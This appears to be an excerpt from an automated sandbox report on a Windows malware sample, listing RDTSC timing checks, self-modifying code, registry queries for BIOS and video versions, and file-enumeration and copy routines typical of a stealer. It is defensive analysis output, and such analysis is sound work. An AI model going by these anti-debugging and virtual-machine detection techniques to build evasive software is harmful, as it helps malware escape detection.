              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD91E second address: 10CD934 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FAE58F8563Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE2ED second address: 10CE308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Bh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC95E second address: 10CC97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FAE58F8563Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC97B second address: 10CC9B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85886h 0x00000007 jno 00007FAE58F85876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAE58F85883h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC9B5 second address: 10CC9CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D115A second address: 10D1160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1160 second address: 10D1166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D5A3B second address: 10D5A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D5A45 second address: 10D5A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3250 second address: 10E3254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3254 second address: 10E3258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E749D second address: 10E74B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAE58F8587Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E74B2 second address: 10E74B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6FE5 second address: 10E6FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6FE9 second address: 10E7013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85644h 0x00000007 jmp 00007FAE58F85642h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7013 second address: 10E7024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F8587Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED28C second address: 10ED290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED290 second address: 10ED296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5484 second address: 10F548E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAF8B second address: 10FAFA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAE58F85880h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAFA7 second address: 10FAFC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB0ED second address: 10FB107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAE58F85876h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAE58F8587Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB107 second address: 10FB10C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB10C second address: 10FB116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB24C second address: 10FB27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8563Dh 0x00000009 jmp 00007FAE58F85640h 0x0000000e jmp 00007FAE58F8563Dh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB27F second address: 10FB285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB285 second address: 10FB289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB289 second address: 10FB291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB291 second address: 10FB297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB297 second address: 10FB29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB436 second address: 10FB449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8563Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB449 second address: 10FB44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB44D second address: 10FB45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FAE58F85648h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB45B second address: 10FB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Ch 0x00000009 pushad 0x0000000a jbe 00007FAE58F85876h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB474 second address: 10FB495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAE58F85636h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAE58F85643h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBA41 second address: 10FBA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBA47 second address: 10FBA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007FAE58F85636h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11023F8 second address: 1102411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85885h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102411 second address: 1102424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAE58F8563Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102424 second address: 110242A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110213F second address: 1102144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11122C3 second address: 11122CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11122CE second address: 11122D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DC57 second address: 110DC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135218 second address: 1135236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85643h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134475 second address: 1134487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAE58F85882h 0x0000000a jng 00007FAE58F85876h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11348A7 second address: 11348B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11348B5 second address: 11348D1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FAE58F85882h 0x00000010 jnl 00007FAE58F85876h 0x00000016 ja 00007FAE58F85876h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11348D1 second address: 11348DE instructions: 0x00000000 rdtsc 0x00000002 je 00007FAE58F85638h 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11348DE second address: 11348E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134EFD second address: 1134F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113ACB4 second address: 113ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F85886h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113ACD2 second address: 113AD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAE58F85645h 0x0000000a jmp 00007FAE58F8563Fh 0x0000000f push edx 0x00000010 jmp 00007FAE58F85647h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A7E3 second address: 113A7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C785 second address: 113C78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C78B second address: 113C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57102A0 second address: 57102FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 movsx edi, ax 0x00000009 jmp 00007FAE58F85644h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 3E800840h 0x0000001b pushfd 0x0000001c jmp 00007FAE58F85649h 0x00000021 adc esi, 5B985C46h 0x00000027 jmp 00007FAE58F85641h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57102FD second address: 5710303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710303 second address: 5710321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAE58F85642h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710321 second address: 5710327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710327 second address: 571032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103B7 second address: 57103CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAE58F85882h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103CD second address: 57103D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103D1 second address: 57103E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAE58F8587Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103E6 second address: 57103EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103EC second address: 57103F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103F0 second address: 57103F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C45D second address: 105C463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EBF8F4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EBF9CC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10DB634 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_2-27073
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_2-25891
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C818A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C818A0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C83910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C83910
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C81250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C81250
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C81269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C81269
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C8E210
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C8CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C7DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C7DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C82390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,2_2_00C82390
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C7DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C7DB99
